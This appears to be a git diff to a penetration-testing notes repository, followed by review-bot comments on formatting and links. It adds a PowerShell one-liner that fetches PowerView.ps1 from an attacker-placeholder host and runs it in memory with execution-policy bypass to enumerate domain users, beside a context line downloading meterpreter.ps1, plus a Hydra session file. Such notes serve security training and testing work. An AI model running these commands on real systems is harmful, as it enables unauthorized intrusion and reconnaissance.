diff --git a/enumeration/hydra.restore b/enumeration/hydra.restore new file mode 100644 index 0000000..2d8f48d Binary files /dev/null and b/enumeration/hydra.restore differ diff --git a/enumeration/windows/powershell.md b/enumeration/windows/powershell.md index 6f0ebef..ec4fea7 100644 --- a/enumeration/windows/powershell.md +++ b/enumeration/windows/powershell.md @@ -129,6 +129,11 @@ Invoke-Webrequest -Uri 'http:// -OutFile (New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1') ``` +* Webrequest and execute in one go +```sh +powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description" +``` + ## Base64 Decode File ``` [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt))) diff --git a/reverse_engineering/docs/deobfuscation.md b/reverse_engineering/docs/deobfuscation.md new file mode 100644 index 0000000..c6386b6 --- /dev/null +++ b/reverse_engineering/docs/deobfuscation.md @@ -0,0 +1,4 @@ +# Deobfuscation + +* Find a deobfuscator like [de4dot](https://github.com/de4dot/de4dot.git) for e.g. deobfuscating dotfuscator +* In case of dotnet: Do not only use ghidra for reversing, use [ILSpy](https://github.com/icsharpcode/ILSpy.git) as well
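Review bot: `enumeration/hydra.restore` is added as a binary file in a directory of notes, and it looks like an accidental commit. Hydra writes `hydra.restore` to resume an interrupted session, so the file is a run artifact rather than documentation and can carry details of the run it came from. Drop it from this commit and add `hydra.restore` to `.gitignore` so it does not come back.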
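Review bot: In the `enumeration/windows/powershell.md` hunk, the new fence is tagged `sh` although the line is a `powershell` invocation, and the neighbouring fences in this file carry no tag at all. Either leave it untagged like the others or tag it `powershell`. The placeholder `%ATTACKER_IP%` is also inconsistent with the `example.com` placeholder used in the context line just above, and the `%VAR%` form only expands when the line is typed into cmd.exe, which the bullet does not say. Suggest stating the shell the line is meant for in the bullet text and using one placeholder style throughout the file.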
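Review bot: In the new `reverse_engineering/docs/deobfuscation.md`, both links point at `.git` clone URLs (`https://github.com/de4dot/de4dot.git`, `https://github.com/icsharpcode/ILSpy.git`) instead of the repository pages. Link to the pages without the `.git` suffix. The second bullet says to use ILSpy alongside Ghidra for .NET but gives no reason. One clause explaining why (ILSpy decompiles IL back to C#) would make the note useful to someone who has not hit the problem yet. Minor wording: "for e.g." should be just "e.g.", and the product names should be written consistently (Dotfuscator, .NET, Ghidra).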